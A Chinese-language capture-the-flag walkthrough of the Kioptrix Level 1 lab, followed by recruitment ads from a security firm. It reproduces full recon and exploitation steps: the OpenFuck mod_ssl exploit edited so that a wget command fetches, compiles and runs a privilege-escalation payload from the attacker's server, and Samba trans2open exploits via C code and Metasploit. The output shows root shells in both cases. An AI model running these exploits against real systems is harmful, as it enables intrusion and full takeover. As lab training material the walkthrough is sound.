靶场Kioptrix Level 1攻略
2023-4-6 00:22:3 Author: 白帽子(查看原文) 阅读量:15 收藏

STATEMENT

声明

由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,雷神众测及文章作者不为此承担任何责任。

雷神众测拥有对此文章的修改和解释权。如欲转载或传播此文章,必须保证此文章的完整性,包括版权声明等全部内容。未经雷神众测允许,不得任意修改或者增减此文章内容,不得以任何方式将其用于商业目的。

做题步骤

1.先扫描网段找出靶机ip

nmap 扫描网段 nmap -sP xxxxxx/24

2.一般都是web服务 可以通过nmap发现开启的web服务

nmap 全扫描 -sS -sV -A -p- xxxxxx

3.使用目录遍历工具进行扫描

dirb dirsearch gobusterdirb http://xxxxxxx -X .php,.txt,.zip,.htmlpython3 dirsearch.py -u http://xxxxxxx -e .php,.txt,.zip,.htmlgobuster dir -u http://xxxxxxx -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.txt,.html,.zip

通过三个工具进行扫描发现了几个目录,扫描的时候三个工具都可以试下

===============================================================Gobuster v3.1.0by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)===============================================================[+] Url: http://192.168.52.135[+] Method: GET[+] Threads: 10[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt[+] Negative Status codes: 404[+] User Agent: gobuster/3.1.0[+] Extensions: html,zip,php,txt[+] Timeout: 10s===============================================================2022/01/06 02:34:06 Starting gobuster in directory enumeration mode===============================================================/index.html (Status: 200) [Size: 2890]/test.php (Status: 200) [Size: 27]/manual (Status: 301) [Size: 294] [--> http://127.0.0.1/manual/]/usage (Status: 301) [Size: 293] [--> http://127.0.0.1/usage/]/mrtg (Status: 301) [Size: 292] [--> http://127.0.0.1/mrtg/]===============================================================2022/01/06 02:39:27 Finished===============================================================

发现5个路径,index.html为默认页面

test.php的页面为

/manual路径,看到Mod_ssl版本是2.8

/usage/路径看到Webalizer Version 2.01

使用rustscan或者nikto扫描端口服务和端口暴露面
使用rustscan扫描rustscan -u5000 -a192.168.52.135 -- -sC -sV -oA scan.log
可以看到80服务为apache服务,并且开启了111端口rpcbind服务,并且还有mod_ssl服务,apache服务的版本号为1.3.20

80/tcp open http syn-ack ttl 64 Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)|_http-server-header: Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b|_http-title: Test Page for the Apache Web Server on Red Hat Linux| http-methods:| Supported Methods: GET HEAD OPTIONS TRACE|_ Potentially risky methods: TRACE111/tcp open rpcbind syn-ack ttl 64 2 (RPC # 100000)| rpcinfo:| program version port/proto service| 100000 2 111/tcp rpcbind| 100000 2 111/udp rpcbind| 100024 1 1024/tcp status|_ 100024 1 1024/udp status139/tcp open netbios-ssn syn-ack ttl 64 Samba smbd (workgroup: MYGROUP)443/tcp open ssl/https syn-ack ttl 64 Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--/localityName=SomeCity/organizationalUnitName=SomeOrganizationalUnit/emailAd[email protected]| Issuer: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--/localityName=SomeCity/organizationalUnitName=SomeOrganizationalUnit/[email protected]localhost.localdomain

使用nikto扫描nikto -host xxxxx
发现nikto扫描出现了apache服务中存在mod_ssl模块,版本为2.8.4,并且指出这个版本存在远程缓冲区溢出漏洞利用

- Nikto v2.1.6---------------------------------------------------------------------------+ Target IP: 192.168.52.135+ Target Hostname: 192.168.52.135+ Target Port: 80+ Start Time: 2022-01-07 01:41:41 (GMT-5)---------------------------------------------------------------------------+ Server: Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b+ Server may leak inodes via ETags, header found with file /, inode: 34821, size: 2890, mtime: Wed Sep5 23:12:46 2001+ The anti-clickjacking X-Frame-Options header is not present.+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect againstsome forms of XSS+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content ofthe site in a different fashion to the MIME type+ Apache/1.3.20 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL forthe 2.x branch.+ OpenSSL/0.9.6b appears to be outdated (current is at least 1.1.1). OpenSSL 1.0.0o and 0.9.8zc are alsocurrent.+ mod_ssl/2.8.4 appears to be outdated (current is at least 2.8.31) (may depend on server version)+ OSVDB-27487: Apache is vulnerable to XSS via the Expect header+ Allowed HTTP Methods: GET, HEAD, OPTIONS, TRACE+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST+ OSVDB-838: Apache/1.3.20 - Apache 1.x up 1.2.34 are vulnerable to a remote DoS and possible code execution. CAN-2002-0392.+ OSVDB-4552: Apache/1.3.20 - Apache 1.3 below 1.3.27 are vulnerable to a local buffer overflow which allows attackers to kill any process on the system. CAN-2002-0839.+ OSVDB-2733: Apache/1.3.20 - Apache 1.3 below 1.3.29 are vulnerable to overflows in mod_rewrite and mod_cgi. CAN-2003-0542.+ mod_ssl/2.8.4 - mod_ssl 2.8.7 and lower are vulnerable to a remote buffer overflow which may allow a remote shell. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0082, OSVDB-756.+ ///etc/hosts: The server install allows reading of any system file by adding an extra '/' to the URL.+ OSVDB-682: /usage/: Webalizer may be installed. Versions lower than 2.01-09 vulnerable to Cross Site S

mod_ssl远程缓冲区执行漏洞

尝试搜索利用脚本searchsploit mod_ssl,发现2.8.7版本存在多个远程溢出漏洞,尝试利用

尝试利用该漏洞,选择47080.c这个脚本文件进行利用
head看下利用方法,直接gcc编译之后进行利用,gcc -o OpenFuck OpenFuck.c -lcrypto

/** OF version r00t VERY PRIV8 spabam* Version: v3.0.4* Requirements: libssl-dev ( apt-get install libssl-dev )* Compile with: gcc -o OpenFuck OpenFuck.c -lcrypto* objdump -R /usr/sbin/httpd|grep free to get more targets* # hackarena irc.brasnet.org* Note: if required, host ptrace and replace wget target*/

但是首先得改脚本,因为脚本利用过程中会出现下载利用脚本的情况,原脚本中的网址下载过程中间出现问题所以要把脚本下载下来然后本地起个服务器python -m http.server(脚本下载地址https://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c),然后把47080.c脚本中的网址改掉,改成服务器的地址http://192.168.52.137:8000/ptrace-kmod.c然后再重新编译,gcc -o OpenFuck 47080.c -lcrypto

# define COMMAND1 "TERM=xterm; export TERM=xterm; exec bash -i\n"# define COMMAND2 "unset HISTFILE; cd /tmp; **wget http://192.168.52.137:8000/ptrace-kmod.c**; gcc -o exploitptrace-kmod.c -B /usr/bin; rm ptrace-kmod.c; ./exploit; \n"

然后本地启动http服务

% python3 -m http.serverServing HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...

然后运行编译好之后的二进制可执行文件,会有很多系统类型,选择合适的系统类型

0x6a - RedHat Linux 7.2 (apache-1.3.20-16)10x6b - RedHat Linux 7.2 (apache-1.3.20-16)2

编译执行,40这个值可以慢慢加如果40达不到成功提权的效果。

./OpenFuck 0x6b 192.168.52.135 -c 40

提权成功,成功拿到了shell并且是root权限

% ./OpenFuck 0x6b 192.168.52.135 -c 40
******************************************************************** OpenFuck v3.0.4-root priv8 by SPABAM based on openssl-too-open ********************************************************************* by SPABAM with code of Spabam - LSD-pl - SolarEclipse - CORE ** # hackarena irc.brasnet.org ** TNX Xanthic USG # SilverLords # BloodBR # isotk # highsecure # uname ** # ION # delirium # nitr0x # coder # root # endiabrad0s # NHC # TechTeam ** # pinchadoresweb HiTechHate DigitalWrapperz P()W GAT ButtP!rateZ ********************************************************************
Connection... 40 of 40Establishing SSL connectioncipher: 0x4043808c ciphers: 0x80f8050Ready to send shellcodeSpawning shell...bash: no job control in this shellbash-2.05$c; gcc -o exploit ptrace-kmod.c -B /usr/bin; rm ptrace-kmod.c; ./exploit; -kmod.--22:56:58-- http://192.168.52.137:8000/ptrace-kmod.c=> `ptrace-kmod.c'Connecting to 192.168.52.137:8000... connected!HTTP request sent, awaiting response... 200 OKLength: 3,921 [text/x-csrc]0K ... 100% @ 3.74 MB/s22:56:58 (3.74 MB/s) - `ptrace-kmod.c' saved [3921/3921]gcc: file path prefix `/usr/bin' never used[+] Attached to 1368[+] Waiting for signal[+] Signal caught[+] Shellcode placed at 0x4001189d[+] Now wait for suid shell...iduid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)

samba远程代码执行漏洞

通过rustscan或者nmap扫描出来的发现存在samba服务,使用msf扫描samba版本号,发现是samba2.2.1a版本的

msf6 > use auxiliary/scanner/smb/smb_versionmsf6 auxiliary(scanner/smb/smb_version) > optionsModule options (auxiliary/scanner/smb/smb_version):Name Current Setting Required Description---- --------------- -------- -----------RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-MetasploitTHREADS 1 yes The number of concurrent threads (max one per host)msf6 auxiliary(scanner/smb/smb_version) > set rhosts 192.168.52.135rhosts => 192.168.52.135msf6 auxiliary(scanner/smb/smb_version) >msf6 auxiliary(scanner/smb/smb_version) > run[*] 192.168.52.135:139 - SMB Detected (versions:) (preferred dialect:) (signatures:optional)[*] 192.168.52.135:139 - Host could not be identified: Unix (Samba 2.2.1a)[*] 192.168.52.135: - Scanned 1 of 1 hosts (100% complete)[*] Auxiliary module execution completed

searchsploit samba 2.2.1a发现了一个远程代码执行漏洞可以利用

-> # searchsploit samba 2.2.1a------------------------------------------------------------------------------------- ---------------------------------Exploit Title | Path------------------------------------------------------------------------------------- ---------------------------------Samba 2.2.0 < 2.2.8 (OSX) - trans2open Overflow (Metasploit) | osx/remote/9924.rbSamba < 2.2.8 (Linux/BSD) - Remote Code Execution | multiple/remote/10.cSamba < 3.0.20 - Remote Heap Overflow | linux/remote/7701.txtSamba < 3.6.2 (x86) - Denial of Service (PoC) | linux_x86/dos/36741.py------------------------------------------------------------------------------------- ---------------------------------

head查看exp

/*Remote root exploit for Samba 2.2.x and prior that works againstLinux (all distributions), FreeBSD (4.x, 5.x), NetBSD (1.x) andOpenBSD (2.x, 3.x and 3.2 non-executable stack).sambal.c is able to identify samba boxes. It will send a netbiosname packet to port 137. If the box responds with the mac address00-00-00-00-00-00, it's probally running samba.[esdee@embrace esdee]$ ./sambal -d 0 -C 60 -S 192.168.0samba-2.2.8 < remote root exploit by eSDee (www.netric.org|be)--------------------------------------------------------------

编译成可执行文件然后执行。

gcc -g -o samba2root 10.c

然后执行exp,拿到权限

./samba2root -d 0 -C 60 -S 192.168.93.134

第二种利用方法,使用msf进行渗透

use exploit/linux/samba/trans2openmsf6 exploit(linux/samba/trans2open) > set payload linux/x86/shell/bind_tcppayload => linux/x86/shell_bind_tcpmsf6 exploit(linux/samba/trans2open) >set rhosts 192.168.93.134msf6 exploit(linux/samba/trans2open) > run[*] 192.168.93.134:139 - Trying return address 0xbffffdfc...[*] Started bind TCP handler against 192.168.93.134:4444[*] 192.168.93.134:139 - Trying return address 0xbffffcfc...[*] 192.168.93.134:139 - Trying return address 0xbffffbfc...[*] 192.168.93.134:139 - Trying return address 0xbffffafc...[*] Sending stage (36 bytes) to 192.168.93.134[*] 192.168.93.134:139 - Trying return address 0xbffff9fc...[*] 192.168.93.134:139 - Trying return address 0xbffff8fc...[*] 192.168.93.134:139 - Trying return address 0xbffff7fc...[*] 192.168.93.134:139 - Trying return address 0xbffff6fc...[*] 192.168.93.134:139 - Trying return address 0xbffff5fc...[*] Command shell session 2 opened (192.168.93.129:34145 -> 192.168.93.134:4444 ) at 2022-02-26 12:45:53 +0800iduid=0(root) gid=0(root) groups=99(nobody)

RECRUITMENT

招聘启事

安恒雷神众测SRC运营(实习生)
————————
【职责描述】
1.  负责SRC的微博、微信公众号等线上新媒体的运营工作,保持用户活跃度,提高站点访问量;
2.  负责白帽子提交漏洞的漏洞审核、Rank评级、漏洞修复处理等相关沟通工作,促进审核人员与白帽子之间友好协作沟通;
3.  参与策划、组织和落实针对白帽子的线下活动,如沙龙、发布会、技术交流论坛等;
4.  积极参与雷神众测的品牌推广工作,协助技术人员输出优质的技术文章;
5.  积极参与公司媒体、行业内相关媒体及其他市场资源的工作沟通工作。

【任职要求】 
 1.  责任心强,性格活泼,具备良好的人际交往能力;
 2.  对网络安全感兴趣,对行业有基本了解;
 3.  良好的文案写作能力和活动组织协调能力。

简历投递至 

[email protected]

设计师(实习生)

————————

【职位描述】
负责设计公司日常宣传图片、软文等与设计相关工作,负责产品品牌设计。

【职位要求】
1、从事平面设计相关工作1年以上,熟悉印刷工艺;具有敏锐的观察力及审美能力,及优异的创意设计能力;有 VI 设计、广告设计、画册设计等专长;
2、有良好的美术功底,审美能力和创意,色彩感强;

3、精通photoshop/illustrator/coreldrew/等设计制作软件;
4、有品牌传播、产品设计或新媒体视觉工作经历;

【关于岗位的其他信息】
企业名称:杭州安恒信息技术股份有限公司
办公地点:杭州市滨江区安恒大厦19楼
学历要求:本科及以上
工作年限:1年及以上,条件优秀者可放宽

简历投递至 

[email protected]

安全招聘

————————
公司:安恒信息
岗位:Web安全 安全研究员
部门:战略支援部
工作年限:1年+
工作地点:杭州(总部)、广州、成都、上海、北京

工作环境:一座大厦,健身场所,医师,帅哥,美女,高级食堂…

【岗位职责】
1.定期面向部门、全公司技术分享;
2.前沿攻防技术研究、跟踪国内外安全领域的安全动态、漏洞披露并落地沉淀;
3.负责完成部门渗透测试、红蓝对抗业务;
4.负责自动化平台建设
5.负责针对常见WAF产品规则进行测试并落地bypass方案

【岗位要求】
1.至少1年安全领域工作经验;
2.熟悉HTTP协议相关技术
3.拥有大型产品、CMS、厂商漏洞挖掘案例;
4.熟练掌握php、java、asp.net代码审计基础(一种或多种)
5.精通Web Fuzz模糊测试漏洞挖掘技术
6.精通OWASP TOP 10安全漏洞原理并熟悉漏洞利用方法
7.有过独立分析漏洞的经验,熟悉各种Web调试技巧
8.熟悉常见编程语言中的至少一种(Asp.net、Python、php、java)

【加分项】
1.具备良好的英语文档阅读能力;
2.曾参加过技术沙龙担任嘉宾进行技术分享;
3.具有CISSP、CISA、CSSLP、ISO27001、ITIL、PMP、COBIT、Security+、CISP、OSCP等安全相关资质者;
4.具有大型SRC漏洞提交经验、获得年度表彰、大型CTF夺得名次者;
5.开发过安全相关的开源项目;
6.具备良好的人际沟通、协调能力、分析和解决问题的能力者优先;
7.个人技术博客;
8.在优质社区投稿过文章;

岗位:红队武器化Golang开发工程师

工作年限:2年+
工作地点:杭州(总部)

【岗位职责】
1.负责红蓝对抗中的武器化落地与研究;
2.平台化建设;
3.安全研究落地。

【岗位要求】
1.掌握C/C++/Java/Go/Python/JavaScript等至少一门语言作为主要开发语言;
2.熟练使用Gin、Beego、Echo等常用web开发框架、熟悉MySQL、Redis、MongoDB等主流数据库结构的设计,有独立部署调优经验;
3.了解docker,能进行简单的项目部署;
3.熟悉常见web漏洞原理,并能写出对应的利用工具;
4.熟悉TCP/IP协议的基本运作原理;
5.对安全技术与开发技术有浓厚的兴趣及热情,有主观研究和学习的动力,具备正向价值观、良好的团队协作能力和较强的问题解决能力,善于沟通、乐于分享。

【加分项】
1.有高并发tcp服务、分布式、消息队列等相关经验者优先;
2.在github上有开源安全产品优先;
3:有过安全开发经验、独自分析过相关开源安全工具、以及参与开发过相关后渗透框架等优先;
4.在freebuf、安全客、先知等安全平台分享过相关技术文章优先;
5.具备良好的英语文档阅读能力。

简历投递至

[email protected]

END

长按识别二维码关注我们


文章来源: http://mp.weixin.qq.com/s?__biz=MzAwMDQwNTE5MA==&mid=2650246616&idx=1&sn=ce987d0c3e32a2f9aff94b21aa9414b5&chksm=82ea5671b59ddf675f6374751be35ca7cbe576bd620715b48a157bffeae244169373e4522647#rd
如有侵权请联系:admin#unsafe.sh